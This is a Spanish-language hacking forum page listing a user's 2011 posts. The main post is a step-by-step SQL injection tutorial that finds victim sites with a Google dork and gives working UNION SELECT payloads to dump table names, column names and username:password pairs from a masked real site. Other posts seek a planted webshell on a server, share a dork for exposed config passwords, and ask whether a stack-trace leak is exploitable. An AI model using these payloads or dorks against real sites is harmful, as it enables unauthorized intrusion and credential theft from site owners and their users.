Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - ruben_linux

#41
Nivel Web / webshell inyectada, pero no la encuentro
19 Noviembre 2011, 13:53 PM
Tengo acceso a un servidor en el que puedo subir una webshell, pero una vez subida no la encuentro, he probado nikto y dirbuster.

Alguien puede ayudarme? la idea es crear un videotuto
#42
Dudas Generales / posible falla????
31 Octubre 2011, 19:34 PM
Tengo una duda sobre un posible fallo en una web.
El caso es que trasteando, cuando modificas la url, de esta manera

www.XXXXXXXX.com/asdf

me devuelve la pagina mal cargada, con este error:

CitarAn error occurred
Page not found
Exception information:

Message: Invalid controller specified (asdf)
Stack trace:

#0 /var/www/vhosts/XXXXXXXX.com/httpdocs/library/Zend/Controller/Front.php(954): Zend_Controller_Dispatcher_Standard->dispatch(Object(Zend_Controller_Request_Http), Object(Zend_Controller_Response_Http))
#1 /var/www/vhosts/XXXXXXXX.com/httpdocs/library/Zend/Application/Bootstrap/Bootstrap.php(97): Zend_Controller_Front->dispatch()
#2 /var/www/vhosts/XXXXXXXXX.com/httpdocs/library/Zend/Application.php(366): Zend_Application_Bootstrap_Bootstrap->run()
#3 /var/www/vhosts/XXXXXXXX.com/httpdocs/index.php(71): Zend_Application->run()
#4 {main} 

Request Parameters:

array (
  'controller' => 'asdf',
  'action' => 'index',
  'module' => 'default',


La pregunta es si alguien sabe, si esto es una falla explotable?
#44
Foro Libre / tipos de hash
18 Septiembre 2011, 22:53 PM
DES(Unix)
Example: IvS7aeT4NzQPM
Used in Linux and other similar OS.
Length: 13 characters.
Description: The first two characters are the salt (random characters; in our example the salt is the string "Iv"), then there follows the actual hash.

Domain Cached Credentials
Example: Admin:b474d48cdfc4974d86ef4d24904cdd91
Used for caching passwords of Windows domain.
Length: 16 bytes.
Algorithm: MD4(MD4(Unicode($pass)).Unicode(strtolower($username)))

MD5(Unix)
Example: $1$12345678$XM4P3PrKBgKNnTaqG9P0T/
Used in Linux and other similar OS.
Length: 34 characters.
Description: The hash begins with the $1$ signature, then there goes the salt (up to 8 random characters; in our example the salt is the string "12345678"), then there goes one more $ character, followed by the actual hash.
Algorithm: Actually that is a loop calling the MD5 algorithm 2000 times.

MySQL5
Example: *E6CC90B878B948C35E92B003C792C46C58C4AF40
Used in the new versions of MySQL.
Length: 20 bytes.
Algorithm: SHA-1(SHA-1($pass))
Note: The hashes are to be loaded to the program without the asterisk that stands in the beginning of each hash.

..... y muchos mas....

fuente:http://forum.insidepro.com/viewtopic.php?t=8225
#45
Nivel Web / dork zend de exploit-db
11 Septiembre 2011, 22:39 PM
Los Dork's son peligrosos, eso todos lo sabemos, bueno, pues aqui les dejo un ejemplo de como se pueden usar. La verdad no tinen ninguna ciencia.

En concreto este:

Google search: filetype:ini "Bootstrap.php" (pass|passwd|password|pwd)
Submited: 2011-08-25

http://www.youtube.com/watch?v=KJCnUlv-Xj4
#46
Nivel Web / vulnerable a injeccion remota SQL
31 Agosto 2011, 23:33 PM
Citar**********************************************
********************ruben_linux***************
**********************************************
******vulnerable a injeccion remota SQL*******

autor==>ruben_linux
equipo=>ruben_linux

fuente: http://packetstormsecurity.org/files/view/104643/arsolutions-sql.txt

;-) ;-)
#47
Desafíos - Wargames / Re: Duda con el Spoof
29 Agosto 2011, 15:51 PM
puedes mostrar toda la cabecera??
#48
WarZone / Re: Zona 0
27 Agosto 2011, 19:33 PM
Citarmethod="GET"

Sabes como se comunica un cliente con un servidor,... los metodos "post" y "get"

Citarif (cod.length != 16){

si la longitud es distinta (!=) de 16....

CitarQué es "var"?

Necesitas algun tuto de programacion... var...iables...?

Citarprueba (Zona 0)

Cual es esa??? :huh:
#49
Nivel Web / Re: sqli+bug+exploit=videotuto
26 Agosto 2011, 13:05 PM
Cita de: WarGhost en 26 Agosto 2011, 02:54 AM
A mi ya con el titulo del vídeo.... "vulneravilidad" ya me sorprendió.  ;-)

Gracias WarGhost. Ya lo cambie.
#50
Nivel Web / sqli+bug+exploit=videotuto
25 Agosto 2011, 23:47 PM
Saludos a todos. Soy ruben_linux, voy enseñar como hago SQLi

1.- buscamos victima.

inurl:software/categoria.php?

2.- exploit

+and+1=0

3.- buscamos union select

Citarhttp://www.xxxxxxx.com/software/categoria.php?cid=8+and+1=0+union+select+1--

4.- buscamos las tablas

Citarhttp://www.xxxxxxxxx.com/software/categoria.php?cid=8+and+1=0+union+select+replace(group_concat(table_name),0x2C,0x3C62723E)+from+information_schema.tables--

5.- buscamos las columnas

Citarhttp://www.xxxxxxx.com/software/categoria.php?cid=8+and+1=0+union+select+replace(group_concat(column_name),0x2C,0x3C62723E)+from+information_schema.columns--

6.- le pedimos que nos muestre el nick y la pass de la tabla usuarios.

Citarhttp://www.xxxxxxxxxx.com/software/categoria.php?cid=8+and+1=0+union+select+concat_ws(char(58),nick,PASSWORD)+from+usuarios+limit+0,1--
vamos cambiando en limit+0,1-- por (1,1) (2,1) (3,1) y nos va dando los demas pares de user:pass

podemos buscar más tablas, y más columnas, aquí solo muestro una pantalla pero se pueden sacar más.

[youtube=425,350]http://www.youtube.com/watch?v=uuEbGos9Cwg[/youtube]